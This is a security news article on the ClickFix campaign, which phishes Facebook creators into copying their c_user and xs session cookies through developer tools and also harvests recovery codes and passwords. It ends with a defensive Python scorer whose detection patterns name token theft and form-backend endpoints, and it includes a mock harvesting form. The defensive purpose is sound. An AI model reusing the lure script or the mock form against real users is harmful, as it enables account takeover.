Attackers have launched a widespread campaign referred to as ClickFix that steals Facebook account credentials by tricking users into handing over their session tokens.
Rather than using advanced malware or software exploits, the attack relies on social engineering to guide victims through a fake verification process.
This campaign has grown significantly since early 2025 and continues to target content creators and business page owners who seek Facebook verification badges.
The ClickFix attack works by combining trust and urgency. Victims receive messages about free verified badges or urgent account reviews. When they click the link, they land on a page that looks exactly like Facebook's official help center or verification portal.
A novel phishing campaign targeting content creators via manual token theft (Source – Hunt.io)
The page explains that the user has been selected for verification or that their account has been flagged for policy violations. This creates pressure to act quickly.
Once on the fake page, victims are guided through a multi-stage process that appears legitimate but is designed to extract their authentication tokens.
The attackers provide instructional videos that teach users how to access their browser's developer tools and copy their Facebook session tokens, specifically the values labeled c_user and xs. Users are told this is a normal verification step and necessary to confirm their identity.
Hunt.io analysts and researchers identified this campaign after Unit 42 Threat Intelligence first reported it in December 2025. The investigation revealed that attackers have created at least 115 distinct phishing pages and eight data collection endpoints.
Initial phishing entry point hosted on Vercel masquerading as a 'Face Verification' page (Source – Hunt.io)
The campaign has been active since January 2025 and primarily targets content creators, monetized pages, and businesses seeking verification status.
A single stolen session token gives attackers full account control, enabling them to change passwords, steal payment information, and impersonate the victim.
The infrastructure behind this campaign is deliberately scattered across multiple hosting platforms to avoid detection.
Phishing pages are hosted on Netlify, Vercel, Wasmer, GitHub Pages, Surge, and other abuse-friendly services. When a page gets taken down, the attacker simply deploys a new one within minutes.
The stolen session tokens are sent to separate data collection endpoints backed by services like Formspark and submit-form.com, which are decoupled from the phishing pages themselves.
How the Attack Flow Works
The infection mechanism begins with a redirect chain designed to feel seamless. Users might click a link from social media promising a free blue badge or claiming their page has been flagged.
This initial page displays an animated verification screen with sound effects and timed animations to build credibility.
Once the animation completes, the victim is automatically redirected to a second page that fully impersonates Facebook's branding, including logos, colors, and official-looking language.
A form to collect Facebook authentication tokens from victims to continue the verification process (Source – Hunt.io)
At this stage, prominent red warnings and urgent messaging push the user to continue.
The page displays things like "Action Required" buttons and countdown timers to trigger immediate responses.
The victim is presented with an embedded tutorial video that explicitly walks through the manual extraction process. The video shows how to open browser developer tools, navigate to the Storage or Application tab, and copy the specific session cookie values.
This is the critical step where victims voluntarily hand over their authentication tokens.
Once the user enters their c_user and xs values into a form field, the JavaScript code validates the tokens in real time to ensure they match legitimate Facebook session patterns.
This filtering reduces noise on the attacker's backend and ensures only valid, reusable sessions are captured.
The script includes instructions telling victims not to log out for 24 hours, which keeps the harvested cookies valid long enough for immediate account takeover.
If the initial token theft succeeds, the attacker gains instant access to the account and can begin making changes.
However, if the stolen session fails to work later, the attack has fallback options. The fake verification page introduces additional harvesting stages where victims are asked to provide backup or recovery codes.
After these codes are collected, a pop-up appears claiming that additional password verification is required.
This final request tricks users into surrendering their actual Facebook password, completing a full credential harvesting chain that gives attackers multiple ways to regain access even if the session token becomes invalid.
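As an added example (not Hunt.io's or Unit 42's code), a heuristic scorer a defender could run over fetched page content from a URL scanner or proxy to flag pages that match the harvesting pattern described above: input fields for the c_user and xs cookies, developer-tools instructions, the "do not log out for 24 hours" text, and form submissions to decoupled form-backend services. The indicator weights, threshold, form id and sample pages are constructed for this illustration.

```python
"""Heuristic detector for ClickFix-style Facebook session-token harvesting pages.

Added example, not tooling from Hunt.io or Unit 42. Indicator weights and the
threshold are this example's own choice; tune them against real samples.
"""
import re
from dataclasses import dataclass, field

# Each indicator: (name, pattern, weight). Patterns follow the campaign traits
# described in the write-up; none of them alone should cross the threshold.
INDICATORS = [
    ("token_fields", re.compile(r"(?:name|id)=['\"]?(?:c_user|xs)(?:['\"]|\s|>)", re.I), 3),
    ("devtools_howto", re.compile(r"developer tools|inspect element|\b(?:storage|application) tab\b", re.I), 2),
    ("cookie_copy", re.compile(r"copy.{0,40}(?:cookie|session|token)", re.I | re.S), 2),
    ("no_logout", re.compile(r"do(?:es)? not log ?out.{0,30}24 hours", re.I), 3),
    ("urgency", re.compile(r"action required|(?:account|page) (?:has been )?flagged|verified badge", re.I), 1),
    ("form_backend", re.compile(r"https?://[^\s\"']*(?:formspark|submit-form\.com)", re.I), 3),
]
THRESHOLD = 6  # a lone urgency phrase or a lone form backend is not enough


@dataclass
class Verdict:
    score: int = 0
    hits: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def score_page(html: str) -> Verdict:
    """Score raw HTML/JS of a page; returns the weighted score and matched indicators."""
    verdict = Verdict()
    for name, pattern, weight in INDICATORS:
        if pattern.search(html):
            verdict.score += weight
            verdict.hits.append(name)
    return verdict


# Constructed sample mimicking the described flow (placeholder form id, not a real one).
PHISHING_SAMPLE = """<h1>Action Required: Meta Verified Badge</h1>
<p>Your page has been flagged. Open your browser's Developer Tools, go to the
Storage tab and copy the cookie values below.</p>
<form action="https://submit-form.com/EXAMPLE-FORM-ID" method="post">
  <input name="c_user" placeholder="c_user"> <input name="xs" placeholder="xs">
</form>
<p>Do not log out for 24 hours while verification completes.</p>"""

# Constructed benign help-center page that merely mentions verified badges.
BENIGN_SAMPLE = """<h1>Help Center: Manage your verified badge</h1>
<p>Learn how a verified badge works and how to request one from your settings.</p>
<form action="/help/contact" method="post"><input name="email"></form>"""

if __name__ == "__main__":
    for label, page in (("phishing", PHISHING_SAMPLE), ("benign", BENIGN_SAMPLE)):
        v = score_page(page)
        print(f"{label}: score={v.score} suspicious={v.suspicious} hits={v.hits}")
```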
